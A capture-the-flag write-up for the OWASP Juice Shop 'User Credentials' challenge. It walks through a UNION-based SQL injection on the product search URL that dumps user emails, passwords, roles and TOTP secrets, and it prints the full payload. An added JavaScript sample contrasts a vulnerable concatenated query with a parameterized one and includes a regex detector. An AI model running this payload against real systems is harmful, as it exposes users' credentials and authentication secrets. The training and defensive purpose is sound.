Challenge:
Name: User Credentials
Description: Retrieve a list of all user credentials via SQL Injection.
Difficulty: 4 star
Category: Injection
Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html
Tools used:
None.
Resources used:
Methodology:
In the expanded description for this challenge it is made fairly obvious that it will be very similar to the Database Schema challenge, for which a special SQL injection payload had to be crafted. As this time around the target is only the user credential table, it's handy to have an idea of what the table entries look like. To gather that information, you can either complete the Database Schema or Administration Section challenges. The Admin Section challenge requires a few additional steps in terms of using the browser's developer tools to track down the authentication-details.on file. The end result, however, is that the below set of information is what the database tracks about each user.

Knowing this, it's just a matter of crafting an SQL query and using the injection syntax ("q=word')) … query … --") from the Database Schema challenge on the same vulnerable URL. The Database Schema challenge showed that the query we craft must select exactly nine columns from the Users table (to match the column count of the original product query), and since that table has more than nine columns, the query used to complete this challenge is somewhat customizable in terms of which data you're looking to extract from the database. In my case, I chose ID, email, password, role, isActive, username, createdAt, deletedAt, and totpSecret. My query was "none')) UNION SELECT id, email, password, role, isActive, username, createdAt, deletedAt, totpSecret FROM Users--". I then added that query string to the /rest/products/search?q= URL and hit enter.
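As an added illustration (not code from this write-up or from Juice Shop itself), the following models a product-search query built by string concatenation, the way the vulnerable search endpoint behaves, beside a parameterized version and a simple log-review check; the table and column names are assumed for the example.

```javascript
// Added illustration, not code from the write-up or from Juice Shop itself.
// Table and column names below are assumed for the example.

// Vulnerable pattern: the search term is spliced into the SQL text, so a term
// that closes the LIKE clause and both parentheses can append its own SELECT.
// The UNION only returns rows because it selects as many columns (nine) as
// "SELECT * FROM Products" does.
function buildSearchQueryVulnerable(criteria) {
  return "SELECT * FROM Products WHERE ((name LIKE '%" + criteria +
    "%' OR description LIKE '%" + criteria + "%') AND deletedAt IS NULL) ORDER BY name";
}

// Hardened pattern: the SQL text is constant and the term is passed as a bound
// parameter, so quotes, parentheses and comment markers inside it stay data.
function buildSearchQuerySafe(criteria) {
  const like = "%" + criteria + "%";
  return {
    sql: "SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) AND deletedAt IS NULL) ORDER BY name",
    params: [like, like],
  };
}

// What the database engine actually executes once a trailing "--" comment
// has discarded the remainder of the statement.
function effectiveStatement(sql) {
  const cut = sql.indexOf("--");
  return (cut === -1 ? sql : sql.slice(0, cut)).trim();
}

// Log-review check for the search endpoint: a q value that closes the clause
// and introduces a UNION SELECT is this technique's signature, not a product name.
function looksLikeUnionInjection(criteria) {
  return /'\s*\)\)\s*UNION\s+SELECT/i.test(criteria);
}

// The payload from the write-up, constructed here as a string literal.
const PAYLOAD = "none')) UNION SELECT id, email, password, role, isActive, username, " +
  "createdAt, deletedAt, totpSecret FROM Users--";

console.log(effectiveStatement(buildSearchQueryVulnerable(PAYLOAD)));
console.log(buildSearchQuerySafe(PAYLOAD).sql); // SQL text unchanged; payload stays in params
console.log(looksLikeUnionInjection(PAYLOAD));  // true
```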


Prevention and Mitigation Strategies:
Lessons Learned and Things Worth Mentioning:
I'm slowly getting better at SQL queries. Despite earning an A in my Databases class, and having planned, diagrammed, and implemented a MySQL database using PHP, injection attacks felt awkward for a long time. It's nice to see that progress.